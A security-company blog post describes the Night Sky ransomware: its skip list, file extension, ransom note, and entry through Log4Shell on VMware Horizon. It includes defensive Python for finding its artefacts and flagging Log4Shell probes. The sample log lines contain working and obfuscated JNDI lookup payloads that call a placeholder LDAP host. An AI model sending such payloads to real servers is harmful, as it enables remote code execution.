New Night Sky Ransomware Enters Corporate Ransom Attack Scene


Night Sky is a newly discovered ransomware that targets corporate networks, steals data before encrypting, and uses the stolen data for extortion; the operators have been seen gaining access through VMware Horizon servers. The operation went live on December 27, 2021.

Night Sky: Everything You Need to Know

MalwareHunterTeam first spotted the ransomware after the group had published data belonging to two victims.

The group's Tor data leak site lists one victim in Bangladesh and another in Japan.

The attackers sought $800,000 in ransom for the decryptor from one of the victims, threatening to leak the stolen data if the ransom was not paid.

Night Sky began operating in the last week of December 2021. Little is known about it yet, but a human operator is likely to carry out reconnaissance, move through the network, and exfiltrate files from endpoints before the encryptor is launched. The Night Sky operators are also assumed to rely on tried-and-true ways into business networks, such as social engineering and stolen credentials.


Once launched, the ransomware encrypts most files on the infected host. It skips files with the .dll and .exe extensions, and it also leaves alone the following files and folders:

  • $Recycle.Bin
  • All Users
  • AppData
  • autorun.inf
  • Boot
  • boot.ini
  • bootfont.bin
  • bootmgfw.efi
  • bootmgr
  • bootmgr.efi
  • bootsect.bak
  • desktop.ini
  • Google
  • iconcache.db
  • Internet Explorer
  • Mozilla
  • Mozilla Firefox
  • ntldr
  • ntuser.dat
  • ntuser.dat.log
  • ntuser.ini
  • Opera
  • Opera Software
  • Program Files
  • Program Files (x86)
  • ProgramData
  • thumbs.db
  • Tor Browser
  • Windows
  • Windows.old

Every file that is encrypted (that is, everything not on the skip list above) is renamed with the .nightsky extension.

Operational aspects

While running, the ransomware encrypts every file except those with the .dll or .exe extension and the system locations listed above.

The .nightsky extension is appended to the names of encrypted files. A ransom note named NightSkyReadMe.hta is dropped in each folder with further instructions on how to pay.

For negotiation, the group uses e-mail accounts and a Rocket.Chat site; the ransom note contains the Rocket.Chat URL together with the credentials needed to log in.
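The two on-disk indicators described above (files renamed with the .nightsky extension and the NightSkyReadMe.hta note dropped in each folder) are simple to hunt for. The following script is an added example, not code from the original article or from IEMLabs: it walks a file tree, reports encrypted files and ransom notes, and separately flags .nightsky files found under a location the article says the encryptor skips, since such hits suggest a different variant or manual renaming and deserve a closer look. The sample tree built by build_sample_tree() is constructed for the demonstration.

```python
"""Hunt for Night Sky ransomware artefacts on a file tree (added example)."""
import os
import tempfile
from pathlib import Path

ENCRYPTED_EXT = ".nightsky"
RANSOM_NOTE = "NightSkyReadMe.hta"

# Names the article says the encryptor leaves alone (directories and files).
SKIPPED_NAMES = {
    "$Recycle.Bin", "All Users", "AppData", "autorun.inf", "Boot", "boot.ini",
    "bootfont.bin", "bootmgfw.efi", "bootmgr", "bootmgr.efi", "bootsect.bak",
    "desktop.ini", "Google", "iconcache.db", "Internet Explorer", "Mozilla",
    "Mozilla Firefox", "ntldr", "ntuser.dat", "ntuser.dat.log", "ntuser.ini",
    "Opera", "Opera Software", "Program Files", "Program Files (x86)",
    "ProgramData", "thumbs.db", "Tor Browser", "Windows", "Windows.old",
}


def scan_tree(root):
    """Walk root and return (encrypted_files, ransom_notes, unexpected).

    unexpected lists .nightsky files that sit under a directory on the skip
    list; the article says Night Sky does not touch those, so a hit there is
    worth investigating rather than ignoring.
    """
    root = Path(root)
    encrypted, notes, unexpected = [], [], []
    for dirpath, _dirnames, filenames in os.walk(root):
        rel_parts = Path(dirpath).relative_to(root).parts
        in_skipped_dir = any(part in SKIPPED_NAMES for part in rel_parts)
        for name in filenames:
            path = Path(dirpath) / name
            if name == RANSOM_NOTE:
                notes.append(path)
            elif name.lower().endswith(ENCRYPTED_EXT):
                encrypted.append(path)
                if in_skipped_dir:
                    unexpected.append(path)
    return encrypted, notes, unexpected


def build_sample_tree(base):
    """Create a constructed sample tree: a user profile hit, system dirs intact."""
    base = Path(base)
    files = {
        "Users/alice/Documents/report.docx.nightsky": b"encrypted",
        "Users/alice/Documents/NightSkyReadMe.hta": b"<html>ransom note</html>",
        "Users/alice/Desktop/notes.txt.nightsky": b"encrypted",
        "Users/alice/Desktop/NightSkyReadMe.hta": b"<html>ransom note</html>",
        "Users/alice/Desktop/tool.exe": b"MZ",           # .exe is never encrypted
        "Program Files/App/app.exe": b"MZ",             # skipped directory
        "Program Files/App/settings.ini": b"[app]",     # skipped directory, intact
        "Windows/Temp/strange.log.nightsky": b"?",      # should not occur per the article
    }
    for rel, data in files.items():
        p = base / rel
        p.parent.mkdir(parents=True, exist_ok=True)
        p.write_bytes(data)


def run_demo():
    """Build the constructed tree in a temp directory, scan it, return relative paths."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        encrypted, notes, unexpected = scan_tree(tmp)
        rel = lambda paths: sorted(p.relative_to(tmp).as_posix() for p in paths)
        return rel(encrypted), rel(notes), rel(unexpected)


if __name__ == "__main__":
    enc, notes, odd = run_demo()
    print("encrypted:", *enc, sep="\n  ")
    print("ransom notes:", *notes, sep="\n  ")
    print("unexpected (under skipped dirs):", *odd, sep="\n  ")
```

On a live host, run scan_tree() against each volume root rather than the sample tree; the note is the faster indicator to search for because the encryptor drops one per folder, while the extension check tells you the blast radius.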

A connection to China

The Night Sky ransomware has been deployed by a China-based threat group tracked as DEV-0401. In their campaign they exploited the Log4Shell vulnerability (CVE-2021-44228) to gain access to internet-facing VMware Horizon systems.
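Because the initial access described above came through Log4Shell, the first question an incident responder asks is whether the Horizon front end received JNDI lookup strings. The following is an added example, not code from the article, IEMLabs or VMware: it normalises the common obfuscations attackers used to evade naive `${jndi:` signatures (percent-encoding, `${lower:j}`/`${upper:J}`, and the `${::-j}` / `${env:NOPE:-j}` default-value trick, all of which Log4j resolves before the lookup fires) and then flags the line. The log lines are constructed generic request lines, not the actual Horizon log format, and the LDAP callback address is a documentation-range placeholder.

```python
"""Flag Log4Shell (CVE-2021-44228) probes in request logs, after de-obfuscation (added example)."""
import re
from urllib.parse import unquote

# Innermost ${...} lookup: no nested "${" inside the braces.
_INNER = re.compile(r"\$\{([^${}]*)\}")


def _resolve(match):
    """Resolve one innermost lookup the way Log4j would, or leave it untouched."""
    body = match.group(1)
    if body.lower().startswith("lower:"):
        return body[6:].lower()
    if body.lower().startswith("upper:"):
        return body[6:].upper()
    if ":-" in body:
        # ${lookup:-default}: Log4j falls back to the default when the lookup
        # yields nothing, so ${::-j} and ${env:NOPE:-j} both become "j".
        return body.split(":-", 1)[1]
    return match.group(0)  # unknown lookup (including jndi:) is kept as-is


def normalise(line):
    """Percent-decode (bounded) and collapse nested lookups until stable."""
    for _ in range(3):  # tolerate double encoding without looping forever
        decoded = unquote(line)
        if decoded == line:
            break
        line = decoded
    while True:
        collapsed = _INNER.sub(_resolve, line)
        if collapsed == line:
            return line
        line = collapsed


def is_log4shell_probe(line):
    """True if the normalised line carries a JNDI lookup."""
    return "${jndi:" in normalise(line).lower()


def flag_lines(lines):
    """Return the indices of lines that look like Log4Shell probes."""
    return [i for i, line in enumerate(lines) if is_log4shell_probe(line)]


# Constructed sample request lines (generic format, not a real Horizon log).
SAMPLE_LINES = [
    '10.0.0.5 - - "GET /index.html HTTP/1.1" 200 ua="Mozilla/5.0"',
    '10.0.0.9 - - "GET /index.html HTTP/1.1" 200 ua="${jndi:ldap://203.0.113.7:1389/a}"',
    '10.0.0.9 - - "GET /index.html HTTP/1.1" 200 ua="${${lower:j}ndi:${lower:l}dap://203.0.113.7:1389/a}"',
    '10.0.0.9 - - "GET /index.html HTTP/1.1" 200 ua="%24%7B%24%7B%3A%3A-j%7Dndi%3Aldap%3A%2F%2F203.0.113.7%3A1389%2Fa%7D"',
    '10.0.0.5 - - "GET /index.html HTTP/1.1" 200 ua="price is ${dollar} today"',
]

if __name__ == "__main__":
    for i in flag_lines(SAMPLE_LINES):
        print(f"line {i}: {normalise(SAMPLE_LINES[i])}")
```

A hit only proves a probe arrived, not that it succeeded; pair it with outbound LDAP/RMI connections from the Horizon host to the address in the lookup, which is what confirms the exploit stage that precedes the ransomware deployment.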

Final thoughts

Ransomware remains one of the most common and damaging threats to businesses worldwide. New families and variants such as Night Sky appear almost every month, which shows that criminals are still making money from it.

By IEMA IEMLabs

IEMLabs is an ISO 27001:2013 and ISO 9001:2015 certified company, we are also a proud member of EC Council, NASSCOM, Data Security Council of India (DSCI), Indian Chamber of Commerce (ICC), U.S. Chamber of Commerce, and Confederation of Indian Industry (CII). The company was established in 2016 with a vision in mind to provide Cyber Security to the digital world and make them Hack Proof. The question is why are we suddenly talking about Cyber Security and all this stuff? With the development of technology, more and more companies are shifting their business to Digital World which is resulting in the increase in Cyber Crimes.
